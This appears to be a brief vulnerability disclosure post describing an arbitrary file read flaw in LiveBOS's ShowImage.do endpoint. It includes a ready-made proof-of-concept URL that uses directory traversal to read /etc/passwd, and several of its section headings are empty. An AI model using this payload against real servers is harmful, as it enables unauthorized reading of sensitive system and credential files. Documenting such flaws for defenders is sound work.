Livebos Showimage Do Arbitrary File Reading Vulnerability
Livebos Showimage Do Arbitrary File Reading Vulnerability
LiveBOS ShowImage.do Arbitrary file reading vulnerability
Vulnerability Description
There is a vulnerability to read arbitrary file in the LiveBOS ShowImage.do interface. An attacker can obtain sensitive files in the server through the vulnerability.
Vulnerability Impact
LiveBOS
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
/feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.